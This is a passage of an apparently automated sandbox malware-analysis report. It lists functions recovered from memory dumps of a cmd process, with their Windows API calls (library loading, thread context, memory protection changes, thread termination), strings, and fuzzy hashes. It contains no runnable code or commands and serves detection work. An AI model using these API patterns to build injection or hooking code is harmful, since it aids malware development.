FreeLibrary.KERNEL32(?,?,?,000001F119D59C6B,?,?,?,000001F119D5945C,?,?,?,?,000001F119D58F65), ref: 000001F119D59BD7
GetProcAddress.KERNEL32(?,?,?,000001F119D59C6B,?,?,?,000001F119D5945C,?,?,?,?,000001F119D58F65), ref: 000001F119D59BE3

Strings

api-ms-, xrefs: 000001F119D59B51

Memory Dump Source

Source File: 00000015.00000002.2546953403.000001F119D51000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F119D50000, based on PE: true

Associated: 00000015.00000002.2546116951.000001F119D50000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2547995359.000001F119D65000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2548880954.000001F119D70000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2549743871.000001F119D72000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2550601758.000001F119D79000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1f119d50000_cmd.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
Instruction ID: ad6fd5661dd55edd574d3f812baf7143029090712ad158e2e68d1b5aeda0287f
Opcode Fuzzy Hash: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
Instruction Fuzzy Hash: 7231703121A64AE1FF119B2698407F523A6B756BA0FD94635EE3E47790EF38C444C350

Function 000001F1197D9AAC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,?,000001F1197D9C6B,?,?,?,000001F1197D945C,?,?,?,?,000001F1197D8F65), ref: 000001F1197D9B31
GetLastError.KERNEL32(?,?,?,000001F1197D9C6B,?,?,?,000001F1197D945C,?,?,?,?,000001F1197D8F65), ref: 000001F1197D9B3F
LoadLibraryExW.KERNEL32(?,?,?,000001F1197D9C6B,?,?,?,000001F1197D945C,?,?,?,?,000001F1197D8F65), ref: 000001F1197D9B69
FreeLibrary.KERNEL32(?,?,?,000001F1197D9C6B,?,?,?,000001F1197D945C,?,?,?,?,000001F1197D8F65), ref: 000001F1197D9BD7
GetProcAddress.KERNEL32(?,?,?,000001F1197D9C6B,?,?,?,000001F1197D945C,?,?,?,?,000001F1197D8F65), ref: 000001F1197D9BE3

Strings

api-ms-, xrefs: 000001F1197D9B51

Memory Dump Source

Source File: 00000015.00000002.2533636230.000001F1197D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F1197D0000, based on PE: true

Associated: 00000015.00000002.2532788564.000001F1197D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2534807754.000001F1197E5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2535656225.000001F1197F0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2536508994.000001F1197F2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2537377329.000001F1197F9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1f1197d0000_cmd.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
Instruction ID: 79078bea5e0f67c0689990d580968cf3ca01bafa27522315f69c9d2effeb977c
Opcode Fuzzy Hash: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
Instruction Fuzzy Hash: 5931813221A655E1EE529B2698007F923D6BF45BE0F9A0635EE3B47790EE38C4488B50

Function 000001F119D63400 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 000001F119D63431
GetLastError.KERNEL32 ref: 000001F119D6343D
CloseHandle.KERNEL32 ref: 000001F119D63455
CreateFileW.KERNEL32 ref: 000001F119D63480
WriteConsoleW.KERNEL32 ref: 000001F119D6349F

Strings

CONOUT$, xrefs: 000001F119D63461

Memory Dump Source

Source File: 00000015.00000002.2546953403.000001F119D51000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F119D50000, based on PE: true

Associated: 00000015.00000002.2546116951.000001F119D50000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2547995359.000001F119D65000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2548880954.000001F119D70000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2549743871.000001F119D72000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2550601758.000001F119D79000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1f119d50000_cmd.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
Instruction ID: c8bc36c104579d613e2aaf92f0ea7fa88c7f3c3577bc06a9845517e650cd810a
Opcode Fuzzy Hash: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
Instruction Fuzzy Hash: 44115132218B85D6EB508B66E854769A6A1F788BE4F844234EB6F87B94CF3CC4448780

Function 000001F1197E3400 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 000001F1197E3431
GetLastError.KERNEL32 ref: 000001F1197E343D
CloseHandle.KERNEL32 ref: 000001F1197E3455
CreateFileW.KERNEL32 ref: 000001F1197E3480
WriteConsoleW.KERNEL32 ref: 000001F1197E349F

Strings

CONOUT$, xrefs: 000001F1197E3461

Memory Dump Source

Source File: 00000015.00000002.2533636230.000001F1197D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F1197D0000, based on PE: true

Associated: 00000015.00000002.2532788564.000001F1197D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2534807754.000001F1197E5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2535656225.000001F1197F0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2536508994.000001F1197F2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2537377329.000001F1197F9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1f1197d0000_cmd.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
Instruction ID: dfe7ded31a0d3f08adfb74ad49b68e5dae249f90a9718e3cf060ecd474b7eeed
Opcode Fuzzy Hash: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
Instruction Fuzzy Hash: 6A119631318B51D2E7518B62E85477967A1FB89BE4F800234EB7F47794DF38C9188B40

Function 000001F119D56270 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 000001F119D562AB
GetThreadContext.KERNEL32 ref: 000001F119D56415

Part of subcall function 000001F119D560A0: GetCurrentThreadId.KERNEL32 ref: 000001F119D560A4

Memory Dump Source

Source File: 00000015.00000002.2546953403.000001F119D51000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F119D50000, based on PE: true

Associated: 00000015.00000002.2546116951.000001F119D50000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2547995359.000001F119D65000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2548880954.000001F119D70000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2549743871.000001F119D72000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2550601758.000001F119D79000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1f119d50000_cmd.jbxd

Similarity

API ID: Thread$Current$Context
String ID:
API String ID: 1666949209-0
Opcode ID: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
Instruction ID: 6cb94774491a802405ca0dd9f8034c39fc913ce7cb8353b5a87ebebe82d194bd
Opcode Fuzzy Hash: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
Instruction Fuzzy Hash: 90D17E76208B8DD1EE70DB16E4943AA77B1F388B88F910126EB9E477A5DF38C551CB00

Function 000001F1197D6270 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 000001F1197D62AB
GetThreadContext.KERNEL32 ref: 000001F1197D6415

Part of subcall function 000001F1197D60A0: GetCurrentThreadId.KERNEL32 ref: 000001F1197D60A4

Memory Dump Source

Source File: 00000015.00000002.2533636230.000001F1197D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F1197D0000, based on PE: true

Associated: 00000015.00000002.2532788564.000001F1197D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2534807754.000001F1197E5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2535656225.000001F1197F0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2536508994.000001F1197F2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2537377329.000001F1197F9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1f1197d0000_cmd.jbxd

Similarity

API ID: Thread$Current$Context
String ID:
API String ID: 1666949209-0
Opcode ID: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
Instruction ID: 6f7d5f8d6369c8f5eaa3fc9d5c2b0e3bfe3ec0142a18223c122c8e2b7fb4d2fe
Opcode Fuzzy Hash: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
Instruction Fuzzy Hash: DFD19A76208B89D1DA709B1AE4943AEB7E1F788BC4F500126EB9E477A9DF38C545CF00

Function 000001F119D52098 Relevance: 9.1, APIs: 6, Instructions: 113threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 000001F119D520A6
TlsFree.KERNEL32 ref: 000001F119D5225F
TlsFree.KERNEL32 ref: 000001F119D5226B
TlsFree.KERNEL32 ref: 000001F119D52277
TlsFree.KERNEL32 ref: 000001F119D52283
TlsFree.KERNEL32 ref: 000001F119D5228F

Part of subcall function 000001F119D55E50: GetCurrentThreadId.KERNEL32 ref: 000001F119D55E66

Memory Dump Source

Source File: 00000015.00000002.2546953403.000001F119D51000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F119D50000, based on PE: true

Associated: 00000015.00000002.2546116951.000001F119D50000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2547995359.000001F119D65000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2548880954.000001F119D70000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2549743871.000001F119D72000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2550601758.000001F119D79000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1f119d50000_cmd.jbxd

Similarity

API ID: Free$CurrentThread
String ID:
API String ID: 564911740-0
Opcode ID: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
Instruction ID: a10cebae7078db975e1bb4634a224f6a4c10dec8b895325c3eaa7cf082e27757
Opcode Fuzzy Hash: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
Instruction Fuzzy Hash: 58517E35209B8AE5FE0A9B74E8912E823B3BB44748FC44935A73E466A5EF78D558C340

Function 000001F1197D2098 Relevance: 9.1, APIs: 6, Instructions: 113threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 000001F1197D20A6
TlsFree.KERNEL32 ref: 000001F1197D225F
TlsFree.KERNEL32 ref: 000001F1197D226B
TlsFree.KERNEL32 ref: 000001F1197D2277
TlsFree.KERNEL32 ref: 000001F1197D2283
TlsFree.KERNEL32 ref: 000001F1197D228F

Part of subcall function 000001F1197D5E50: GetCurrentThreadId.KERNEL32 ref: 000001F1197D5E66

Memory Dump Source

Source File: 00000015.00000002.2533636230.000001F1197D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F1197D0000, based on PE: true

Associated: 00000015.00000002.2532788564.000001F1197D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2534807754.000001F1197E5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2535656225.000001F1197F0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2536508994.000001F1197F2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2537377329.000001F1197F9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1f1197d0000_cmd.jbxd

Similarity

API ID: Free$CurrentThread
String ID:
API String ID: 564911740-0
Opcode ID: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
Instruction ID: 35a634e74db6d1d8984af8e098f3f676bafa3c4bb7eb449453718a10ebb7fb52
Opcode Fuzzy Hash: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
Instruction Fuzzy Hash: 41518236209B47E6EA059B35E8902E823A2BF45794FC40935E73E067A9EF74C51DCB50

Function 000001F119D535C8 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,?,?,?,?,000001F119D524D1), ref: 000001F119D535EB
HeapAlloc.KERNEL32(?,?,?,?,?,000001F119D524D1), ref: 000001F119D535FE
StrCmpNIW.SHLWAPI(?,?,?,?,?,000001F119D524D1), ref: 000001F119D53673
GetProcessHeap.KERNEL32(?,?,?,?,?,000001F119D524D1), ref: 000001F119D536D9
HeapFree.KERNEL32(?,?,?,?,?,000001F119D524D1), ref: 000001F119D536E7

Strings

$cnt-, xrefs: 000001F119D5366C

Memory Dump Source

Source File: 00000015.00000002.2546953403.000001F119D51000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F119D50000, based on PE: true

Associated: 00000015.00000002.2546116951.000001F119D50000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2547995359.000001F119D65000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2548880954.000001F119D70000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2549743871.000001F119D72000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2550601758.000001F119D79000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1f119d50000_cmd.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID: $cnt-
API String ID: 756756679-2536841369
Opcode ID: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
Instruction ID: be45dc0f8b6439d1562b9b663e16e9f3e51b669f78ed338fe42bb581fc2daceb
Opcode Fuzzy Hash: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
Instruction Fuzzy Hash: AA319031709B5AE6FE18DF3695403B9A3A2BB44BC4F8840388F6A47B55EF38C4A18700

Function 000001F1197D35C8 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,?,?,?,?,000001F1197D24D1), ref: 000001F1197D35EB
HeapAlloc.KERNEL32(?,?,?,?,?,000001F1197D24D1), ref: 000001F1197D35FE
StrCmpNIW.SHLWAPI(?,?,?,?,?,000001F1197D24D1), ref: 000001F1197D3673
GetProcessHeap.KERNEL32(?,?,?,?,?,000001F1197D24D1), ref: 000001F1197D36D9
HeapFree.KERNEL32(?,?,?,?,?,000001F1197D24D1), ref: 000001F1197D36E7

Strings

$cnt-, xrefs: 000001F1197D366C

Memory Dump Source

Source File: 00000015.00000002.2533636230.000001F1197D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F1197D0000, based on PE: true

Associated: 00000015.00000002.2532788564.000001F1197D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2534807754.000001F1197E5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2535656225.000001F1197F0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2536508994.000001F1197F2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2537377329.000001F1197F9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1f1197d0000_cmd.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID: $cnt-
API String ID: 756756679-2536841369
Opcode ID: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
Instruction ID: bbb51da777e445ed30b8d1a99ab5f34cdef87c7243dca9eb9e0611012be9fa37
Opcode Fuzzy Hash: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
Instruction Fuzzy Hash: B3316F32709B56E6EA19DF36A5406B967E2FF44BC8F884034DF6A07B55EF34C4698B00

Function 000001F119D5C940 Relevance: 9.1, APIs: 6, Instructions: 51COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 000001F119D5C94F
SetLastError.KERNEL32 ref: 000001F119D5C96E
FlsSetValue.KERNEL32 ref: 000001F119D5C997
FlsSetValue.KERNEL32 ref: 000001F119D5C9A8
FlsSetValue.KERNEL32 ref: 000001F119D5C9B9

Part of subcall function 000001F119D5D2A0: HeapFree.KERNEL32(?,?,?,?,?,?,?,000001F119D5674A), ref: 000001F119D5D2B6
Part of subcall function 000001F119D5D2A0: GetLastError.KERNEL32(?,?,?,?,?,?,?,000001F119D5674A), ref: 000001F119D5D2C0

SetLastError.KERNEL32 ref: 000001F119D5C9DC

Memory Dump Source

Source File: 00000015.00000002.2546953403.000001F119D51000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F119D50000, based on PE: true

Associated: 00000015.00000002.2546116951.000001F119D50000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2547995359.000001F119D65000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2548880954.000001F119D70000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2549743871.000001F119D72000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2550601758.000001F119D79000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1f119d50000_cmd.jbxd

Similarity

API ID: ErrorLast$Value$FreeHeap
String ID:
API String ID: 365477584-0
Opcode ID: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
Instruction ID: 6162ae52a34040cd6196f11f9c16a42204eab65c4e24f8ebbb020631b6478a98
Opcode Fuzzy Hash: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
Instruction Fuzzy Hash: FF11A33570C64BF2FE186B31A8113FE2263AB867A1FD44234AB37967CACE38C4418740

Function 000001F1197DC940 Relevance: 9.1, APIs: 6, Instructions: 51COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 000001F1197DC94F
SetLastError.KERNEL32 ref: 000001F1197DC96E
FlsSetValue.KERNEL32 ref: 000001F1197DC997
FlsSetValue.KERNEL32 ref: 000001F1197DC9A8
FlsSetValue.KERNEL32 ref: 000001F1197DC9B9

Part of subcall function 000001F1197DD2A0: HeapFree.KERNEL32(?,?,?,?,?,?,?,000001F1197D674A), ref: 000001F1197DD2B6
Part of subcall function 000001F1197DD2A0: GetLastError.KERNEL32(?,?,?,?,?,?,?,000001F1197D674A), ref: 000001F1197DD2C0

SetLastError.KERNEL32 ref: 000001F1197DC9DC

Memory Dump Source

Source File: 00000015.00000002.2533636230.000001F1197D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F1197D0000, based on PE: true

Associated: 00000015.00000002.2532788564.000001F1197D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2534807754.000001F1197E5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2535656225.000001F1197F0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2536508994.000001F1197F2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2537377329.000001F1197F9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1f1197d0000_cmd.jbxd

Similarity

API ID: ErrorLast$Value$FreeHeap
String ID:
API String ID: 365477584-0
Opcode ID: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
Instruction ID: e8fc113ae2b1cb42df996ba3c7de8adfa5d73b9b0d8b1ca02dfd0af3401d8ced
Opcode Fuzzy Hash: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
Instruction Fuzzy Hash: 54113D33719252E2FA14673169153FE1293AF867E0FD85634EB77667C6DE28D4094A00

Function 000001F119D51A30 Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32 ref: 000001F119D51A56
K32GetModuleFileNameExW.KERNEL32 ref: 000001F119D51A74
PathFindFileNameW.SHLWAPI ref: 000001F119D51A83
lstrlenW.KERNEL32 ref: 000001F119D51A8F
StrCpyW.SHLWAPI ref: 000001F119D51AA2
CloseHandle.KERNEL32 ref: 000001F119D51AB0

Memory Dump Source

Source File: 00000015.00000002.2546953403.000001F119D51000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F119D50000, based on PE: true

Associated: 00000015.00000002.2546116951.000001F119D50000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2547995359.000001F119D65000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2548880954.000001F119D70000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2549743871.000001F119D72000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2550601758.000001F119D79000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1f119d50000_cmd.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID:
API String ID: 517849248-0
Opcode ID: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
Instruction ID: 90bf8292887878d8c763d793f8694db0327fb96419f740c86917638109e6b967
Opcode Fuzzy Hash: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
Instruction Fuzzy Hash: AC012135708B46D6EB14DB22A4543A963A2F789FC0FC840359F6E43754DE3CC586C780

Function 000001F1197D1A30 Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32 ref: 000001F1197D1A56
K32GetModuleFileNameExW.KERNEL32 ref: 000001F1197D1A74
PathFindFileNameW.SHLWAPI ref: 000001F1197D1A83
lstrlenW.KERNEL32 ref: 000001F1197D1A8F
StrCpyW.SHLWAPI ref: 000001F1197D1AA2
CloseHandle.KERNEL32 ref: 000001F1197D1AB0

Memory Dump Source

Source File: 00000015.00000002.2533636230.000001F1197D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F1197D0000, based on PE: true

Associated: 00000015.00000002.2532788564.000001F1197D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2534807754.000001F1197E5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2535656225.000001F1197F0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2536508994.000001F1197F2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2537377329.000001F1197F9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1f1197d0000_cmd.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID:
API String ID: 517849248-0
Opcode ID: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
Instruction ID: 93350730d6b378c501c797d764fc87c24703a75bb55042980683b9fd6ffa39d7
Opcode Fuzzy Hash: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
Instruction Fuzzy Hash: 24012131708B55D6EB14DB22A9543A963A2FB88FC4F884035DF6E43754EE3CC949CB80

Function 000001F119D53E14 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?,?,?,?,?,000001F119D53AAC), ref: 000001F119D53E30
GetCurrentProcess.KERNEL32(?,?,?,?,?,000001F119D53AAC), ref: 000001F119D53E3E
VirtualProtectEx.KERNEL32(?,?,?,?,?,000001F119D53AAC), ref: 000001F119D53E60
GetCurrentProcess.KERNEL32(?,?,?,?,?,000001F119D53AAC), ref: 000001F119D53E7E
VirtualProtectEx.KERNEL32(?,?,?,?,?,000001F119D53AAC), ref: 000001F119D53E9F
TerminateThread.KERNEL32(?,?,?,?,?,000001F119D53AAC), ref: 000001F119D53EAE

Memory Dump Source

Source File: 00000015.00000002.2546953403.000001F119D51000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F119D50000, based on PE: true

Associated: 00000015.00000002.2546116951.000001F119D50000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2547995359.000001F119D65000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2548880954.000001F119D70000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2549743871.000001F119D72000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2550601758.000001F119D79000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1f119d50000_cmd.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
String ID:
API String ID: 449555515-0
Opcode ID: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
Instruction ID: ad35506284549831691e1f3eb5af683a5fdc7384d5e3dca1a9b69a9af9ff8382
Opcode Fuzzy Hash: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
Instruction Fuzzy Hash: 15012D75219B8AD2FF249B71E9487A973A2BB45B45F840138DB6E06364EF3DC088C780

Function 000001F1197D3E14 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?,?,?,?,?,000001F1197D3AAC), ref: 000001F1197D3E30
GetCurrentProcess.KERNEL32(?,?,?,?,?,000001F1197D3AAC), ref: 000001F1197D3E3E
VirtualProtectEx.KERNEL32(?,?,?,?,?,000001F1197D3AAC), ref: 000001F1197D3E60
GetCurrentProcess.KERNEL32(?,?,?,?,?,000001F1197D3AAC), ref: 000001F1197D3E7E
VirtualProtectEx.KERNEL32(?,?,?,?,?,000001F1197D3AAC), ref: 000001F1197D3E9F
TerminateThread.KERNEL32(?,?,?,?,?,000001F1197D3AAC), ref: 000001F1197D3EAE

Memory Dump Source

Source File: 00000015.00000002.2533636230.000001F1197D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F1197D0000, based on PE: true

Associated: 00000015.00000002.2532788564.000001F1197D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2534807754.000001F1197E5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2535656225.000001F1197F0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2536508994.000001F1197F2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2537377329.000001F1197F9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1f1197d0000_cmd.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
String ID:
API String ID: 449555515-0
Opcode ID: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
Instruction ID: 42212b4db22fac93fae1daa25f7c2fd437d278ecf532debb05d6bbdeeaee4e5b
Opcode Fuzzy Hash: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
